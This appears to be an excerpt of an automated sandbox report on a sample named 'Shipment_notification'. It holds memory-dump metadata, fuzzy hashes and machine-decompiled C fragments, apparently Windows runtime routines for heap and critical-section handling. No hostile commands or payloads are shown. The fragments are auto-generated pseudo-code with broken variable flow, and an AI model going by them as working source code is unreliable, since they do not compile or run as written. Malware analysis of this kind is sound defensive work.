                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 1347ca459677eafb8e647e671673cf01e9a57b7e123ce8cb08d5d03b039bd45d
                                                                                • Instruction ID: de7a57fc75bfcd9f9c5d636e5714ea4cf9138c6bcc00e4b3234c03f1f27ab318
                                                                                • Opcode Fuzzy Hash: 1347ca459677eafb8e647e671673cf01e9a57b7e123ce8cb08d5d03b039bd45d
                                                                                • Instruction Fuzzy Hash: E4D0A771200102D2EE2E5B2CDC14B142651EB90781F7904DCF307494C1DFB1CC92E048
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E01B653CA(void* __ebx) {
                                                                                				intOrPtr _t7;
                                                                                				void* _t13;
                                                                                				void* _t14;
                                                                                				intOrPtr _t15;
                                                                                				void* _t16;
                                                                                
                                                                                				_t13 = __ebx;
                                                                                				if( *((char*)(_t16 - 0x65)) != 0) {
                                                                                					E01AFEB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                                                					_t7 =  *((intOrPtr*)(_t16 - 0x64));
                                                                                					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
                                                                                				}
                                                                                				if(_t15 != 0) {
                                                                                					L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
                                                                                					return  *((intOrPtr*)(_t16 - 0x64));
                                                                                				}
                                                                                				return _t7;
                                                                                			}









                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                                                • Instruction ID: 91ff4295e83496352564d2088bd409bd1548a5dbfbdfe0b1e7516b31ea11e1f6
                                                                                • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                                                • Instruction Fuzzy Hash: 98E08C31A006849BCF26DB88CA90F4EBBF9FB54B80F150088A1095F661C728AC00CB40
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E01B135A1(void* __eax, void* __ebx, void* __ecx) {
                                                                                				void* _t6;
                                                                                				void* _t10;
                                                                                				void* _t11;
                                                                                
                                                                                				_t10 = __ecx;
                                                                                				_t6 = __eax;
                                                                                				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
                                                                                					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
                                                                                				}
                                                                                				if( *((char*)(_t11 - 0x1a)) != 0) {
                                                                                					return E01AFEB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                                                				}
                                                                                				return _t6;
                                                                                			}







                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                                                • Instruction ID: 524511a7506927426562d5c08597672e6b97fddcc33adaf2203a82c3a41c2708
                                                                                • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                                                • Instruction Fuzzy Hash: E2D0A9315011859EEB0AAB54C2187683BF3FB00A28FDA20E9D1020687EE33E4A0AC600
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E01AFAAB0() {
                                                                                				intOrPtr* _t4;
                                                                                
                                                                                				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                                                                                				if(_t4 != 0) {
                                                                                					if( *_t4 == 0) {
                                                                                						goto L1;
                                                                                					} else {
                                                                                						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
                                                                                					}
                                                                                				} else {
                                                                                					L1:
                                                                                					return 0x7ffe0030;
                                                                                				}
                                                                                			}





                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                                                • Instruction ID: 432e17550106ded83d399661c42eace513bc08e2d404bbd487157f75a8fafe8d
                                                                                • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                                                • Instruction Fuzzy Hash: 83D0C935352980CFD71BDB1CC554B0533A4FB04B40FC504D0E501CB762E72CD944CA00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E01B6A537(intOrPtr _a4, intOrPtr _a8) {
                                                                                
                                                                                				return L01B08E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
                                                                                			}



                                                                                0x01b6a553

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                                                • Instruction ID: 7b86b8566b831e2caee17cec6bc72c644cd520d0a2ca13a0076f156938edd174
                                                                                • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                                                • Instruction Fuzzy Hash: A1C01232080648BBCF136E81CC00F067F2AEBA4B60F008010BA080A5B0C632EAB0EA84
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E01AEDB40() {
                                                                                				signed int* _t3;
                                                                                				void* _t5;
                                                                                
                                                                                				_t3 = L01B04620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
                                                                                				if(_t3 == 0) {
                                                                                					return 0;
                                                                                				} else {
                                                                                					 *_t3 =  *_t3 | 0x00000400;
                                                                                					return _t3;
                                                                                				}
                                                                                			}






                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                                                • Instruction ID: f70bba88477301544964fcb6be4ee0553f1521dbad77378a17a0ca41d45b8d38
                                                                                • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                                                • Instruction Fuzzy Hash: 3DC08C30290A01AAEF262F20CE01B003AA1BB10B01F4404E0B300DA0F0EB78D801E600
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E01AEAD30(intOrPtr _a4) {
                                                                                
                                                                                				return L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                                                                                			}



                                                                                0x01aead49

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                                                • Instruction ID: 3f7219cf5a466d19dca36eb78254aa27439238f9f879f0d2e46f20a6e3f1c104
                                                                                • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                                                • Instruction Fuzzy Hash: 76C08C32080248BBCB126A45CD00F01BF29E7A0BA0F000020B6040A6A2CA32E860D588
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E01AF76E2(void* __ecx) {
                                                                                				void* _t5;
                                                                                
                                                                                				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
                                                                                					return L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
                                                                                				}
                                                                                				return _t5;
                                                                                			}




                                                                                0x01af76e4
                                                                                0x00000000
                                                                                0x01af76f8
                                                                                0x01af76fd

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                                                • Instruction ID: 858fd73950c63b9fd64a778c4eb52da071b17d6af102eebed99b8cbed617a7ab
                                                                                • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                                                • Instruction Fuzzy Hash: 22C08C701411805AEF2B578CCE20B203A50AB08608F4805ACBB41094E2D368B802C288
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E01B03A1C(intOrPtr _a4) {
                                                                                				void* _t5;
                                                                                
                                                                                				return L01B04620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                                                                                			}




                                                                                0x01b03a35

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                                                • Instruction ID: a9b940221d747ddbb7d42b8a0eced51a74cf1ec1569ffbff87931c3a8ea9f53a
                                                                                • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                                                • Instruction Fuzzy Hash: 89C08C32080648BBCB126E41DD00F017F29E7A0B60F000060B7040A5A0C632EC60D588
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E01B07D50() {
                                                                                				intOrPtr* _t3;
                                                                                
                                                                                				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                                                                                				if(_t3 != 0) {
                                                                                					return  *_t3;
                                                                                				} else {
                                                                                					return _t3;
                                                                                				}
                                                                                			}




                                                                                0x01b07d56
                                                                                0x01b07d5b
                                                                                0x01b07d60
                                                                                0x01b07d5d
                                                                                0x01b07d5d
                                                                                0x01b07d5d

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                                                • Instruction ID: 9def23eff05eda83c983ed3cebce93838b9bb792c535cec02f84b661ef0b2d3f
                                                                                • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                                                • Instruction Fuzzy Hash: E3B092353019408FCE1BDF18C080B1573E4FB44A40B8400D0E400CBA21D729E9008900
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E01B12ACB() {
                                                                                				void* _t5;
                                                                                
                                                                                				return E01AFEB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                                                			}




                                                                                0x01b12adc

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                                                • Instruction ID: 141debeffdda320b8ce8ac77c401ac36fa228855db8cd7b246e3b4179b190688
                                                                                • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                                                • Instruction Fuzzy Hash: BBB01232D10445CFCF02EF80C710B197332FB00790F068494A10167930C228AC01CB40
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                • Instruction ID: dc5f740eb91f802f5c9b789ea40b597effc3d7540f60d8b34b311af05fb3f054
                                                                                • Opcode Fuzzy Hash: 20c7b1c8de60ee7b83ca32ccc2976c32e3ffffdf0398d77f8a574d19027b30ac
                                                                                • Instruction Fuzzy Hash: 9390026225100802D144719D84147071006E7D0642FD1C055A0014554DC756897576F1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 1e85a5dba30ef4187471d7b63ff7b8470388d9968ccb34ef21b905d6ba458b82
                                                                                • Instruction ID: ead4b1aa912075f581719d195184daf6362d373637b283d3c40dcfc33128ab68
                                                                                • Opcode Fuzzy Hash: 1e85a5dba30ef4187471d7b63ff7b8470388d9968ccb34ef21b905d6ba458b82
                                                                                • Instruction Fuzzy Hash: 8490026221504442D104659D5408A061005A7D0246FD1D055A1054595DC7758871B171
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 59c9ef9b885bf403bedc3beebd6818e6ba1eed6f649d5722afcc7e825aec3f70
                                                                                • Instruction ID: ec843570ec728998d0f5c1104db42ca872e52c78f24e3d3955b29677d2c4a678
                                                                                • Opcode Fuzzy Hash: 59c9ef9b885bf403bedc3beebd6818e6ba1eed6f649d5722afcc7e825aec3f70
                                                                                • Instruction Fuzzy Hash: F990027621504442D504659D5804A871005A7D0346FD1D455A041459CDC7948871B161
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 19977b43220cfd2c01da07e24975b5e54be92a1273ae0eaae604dfcd92508647
                                                                                • Instruction ID: 4d3e16b5099702f86a86e2fac6202ceed2f09076cdab77a4620e0b6cab96d4ee
                                                                                • Opcode Fuzzy Hash: 19977b43220cfd2c01da07e24975b5e54be92a1273ae0eaae604dfcd92508647
                                                                                • Instruction Fuzzy Hash: BD90027221100403D104619D55087071005A7D0242FD1D455A0414558DD79688717161
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: c9f3c34c53110b6ab52d4c59927626f969794e7e0a910a57ee106be9970a74c1
                                                                                • Instruction ID: 839618aec2fe1137a3750a2b3929540cdae28265c271f5f375cd052e68a93efe
                                                                                • Opcode Fuzzy Hash: c9f3c34c53110b6ab52d4c59927626f969794e7e0a910a57ee106be9970a74c1
                                                                                • Instruction Fuzzy Hash: F790026221144442D144629D4804B0F5105A7E1243FD1C05DA4146554CCA5588756761
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d83825eacf0f5ba9d06b29ce6c38624615e78376d654a9c0baf191acea0d323f
                                                                                • Instruction ID: 1cbfc1c58d36b9251b1dda047d763a61cce1d7fb3c09bd4203f88dd9232dde5e
                                                                                • Opcode Fuzzy Hash: d83825eacf0f5ba9d06b29ce6c38624615e78376d654a9c0baf191acea0d323f
                                                                                • Instruction Fuzzy Hash: 8C90027221140402D104619D48087471005A7D0343FD1C055A5154555EC7A5C8B17571
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 53%
                                                                                			E01B7FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                                                				void* _t7;
                                                                                				intOrPtr _t9;
                                                                                				intOrPtr _t10;
                                                                                				intOrPtr* _t12;
                                                                                				intOrPtr* _t13;
                                                                                				intOrPtr _t14;
                                                                                				intOrPtr* _t15;
                                                                                
                                                                                				_t13 = __edx;
                                                                                				_push(_a4);
                                                                                				_t14 =  *[fs:0x18];
                                                                                				_t15 = _t12;
                                                                                				_t7 = L01B2CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                                                				_push(_t13);
                                                                                				E01B75720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                                                				_t9 =  *_t15;
                                                                                				if(_t9 == 0xffffffff) {
                                                                                					_t10 = 0;
                                                                                				} else {
                                                                                					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                                                				}
                                                                                				_push(_t10);
                                                                                				_push(_t15);
                                                                                				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                                                				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                                                				return E01B75720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                                                			}











                                                                                APIs
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01B7FDFA
                                                                                Strings
                                                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 01B7FE2B
                                                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 01B7FE01
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                • API String ID: 885266447-3903918235
                                                                                • Opcode ID: 1ea7caaf05b6f94ec6899ecb2ca4c7bfc5be86cf211ecf682df2a2653e07c8b4
                                                                                • Instruction ID: d973e79b016e43bae1a08c84f2acfbfbe2597a2d3c72e39274ec3a900195fcf8
                                                                                • Opcode Fuzzy Hash: 1ea7caaf05b6f94ec6899ecb2ca4c7bfc5be86cf211ecf682df2a2653e07c8b4
                                                                                • Instruction Fuzzy Hash: ABF0C232200601BBEA281A55DC02F33BF6AEB84B30F140359F638561D1DA62B92096F4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%